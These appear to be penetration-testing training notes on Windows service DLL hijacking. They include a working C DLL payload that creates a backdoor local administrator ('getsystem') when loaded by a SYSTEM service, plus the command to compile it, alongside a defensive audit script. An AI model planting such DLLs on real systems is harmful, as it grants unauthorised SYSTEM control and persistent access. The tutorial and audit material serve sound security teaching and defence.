Service DLL Hijacking

There are several methods we can use to exploit how DLLs work on Windows, and they can often be an effective way of elevating our privileges. One method is similar to the privilege escalation vector performed in the previous section: instead of overwriting the service binary itself, we overwrite a DLL the service binary loads. The service may then fail to work as expected because the original DLL functionality is missing, but in most cases this still gives us code execution of the DLL's code, which can be used, for example, to create a new local administrative user.

Another method is to hijack the DLL search order. The search order is defined by Microsoft and determines which locations are inspected, and in which order, when an application loads a DLL by name without an absolute path. By default, all current Windows versions have safe DLL search mode enabled.

This setting was implemented by Microsoft due to the high number of DLL hijacking vectors, and it makes DLLs more difficult to hijack by moving the current directory down the list. The following listing shows the standard search order (with safe DLL search mode enabled) taken from the Microsoft documentation:

  1. The directory from which the application loaded.

  2. The system directory.

  3. The 16-bit system directory.

  4. The Windows directory.

  5. The current directory.

  6. The directories that are listed in the PATH environment variable.

To find candidate services, we first list the running services together with the path of the binary each one executes:

PS C:\Users\Administrator> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
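From the defender's side, the condition that makes the hijack above possible is a service binary living in a directory where non-administrative principals can create files. The following audit script is an added example, not part of the original notes; it checks the SafeDllSearchMode registry value described above and reports running services whose binary directory grants create-file rights to broad groups (the list of principals and the rights checked are assumptions you may want to widen).

```powershell
# Added audit example (not from the original notes). Run as Administrator on the host.
# Reports (1) whether safe DLL search mode is enabled and (2) running services whose
# binary directory lets broad, non-admin principals create files (plant a DLL).

# Principals treated as "broad" for this audit (assumption; extend for your environment).
$broadPrincipals = @('Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# CreateFiles (FILE_WRITE_DATA on a directory) is what planting a new DLL needs;
# Write, Modify and FullControl all include this bit. Generic rights bits are not mapped here.
$createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles

# SafeDllSearchMode: value absent or 1 = enabled (default); 0 = disabled.
$sessionMgr = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
$mode = (Get-ItemProperty -Path $sessionMgr -Name SafeDllSearchMode -ErrorAction SilentlyContinue).SafeDllSearchMode
if ($null -eq $mode -or $mode -eq 1) { 'SafeDllSearchMode: enabled (default)' }
else { 'SafeDllSearchMode: DISABLED - current directory is searched early' }

function Get-ServiceBinaryDir {
    param([string]$PathName)
    # PathName may be quoted ("C:\Program Files\x\svc.exe" -arg) or unquoted with arguments.
    if ($PathName -match '^"([^"]+)"') { $exe = $Matches[1] }
    else { $exe = ($PathName -split ' ')[0] }
    return Split-Path -Path $exe -Parent
}

Get-CimInstance -ClassName Win32_Service |
  Where-Object { $_.State -eq 'Running' -and $_.PathName } |
  ForEach-Object {
    $svc = $_
    $dir = Get-ServiceBinaryDir -PathName $svc.PathName
    if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }
    $acl = Get-Acl -LiteralPath $dir
    $weak = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band $createFiles) -ne 0) -and
        ($broadPrincipals -contains $_.IdentityReference.Value)
    }
    if ($weak) {
        [PSCustomObject]@{
            Service    = $svc.Name
            Directory  = $dir
            WritableBy = ($weak.IdentityReference.Value | Sort-Object -Unique) -join ', '
        }
    }
  }
```

Any service it reports should have its directory ACL tightened so that only administrators and the service account can write there; services whose binary path is unquoted and contains spaces deserve a separate check.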

Example Payload

The following DLL runs its payload from DllMain when the process loads it (DLL_PROCESS_ATTACH). Because the hijacked service runs as SYSTEM, the commands executed by system() create a new local user and add it to the local Administrators group.

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,            // Handle to DLL module
    DWORD  ul_reason_for_call, // Reason for calling function
    LPVOID lpReserved )        // Reserved
{
    switch ( ul_reason_for_call )
    {
    case DLL_PROCESS_ATTACH:   // A process is loading the DLL.
    {
        int i;
        // Executed in the context of the service process (SYSTEM).
        i = system ("net user getsystem getsystem /add");
        i = system ("net localgroup administrators getsystem /add");
        break;
    }
    case DLL_THREAD_ATTACH:    // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:    // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH:   // A process unloads the DLL.
        break;
    }
    return TRUE;
}

The DLL is cross-compiled on Kali with the mingw-w64 toolchain, using --shared so the output is a DLL rather than an executable:

kali@kali:~$ x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll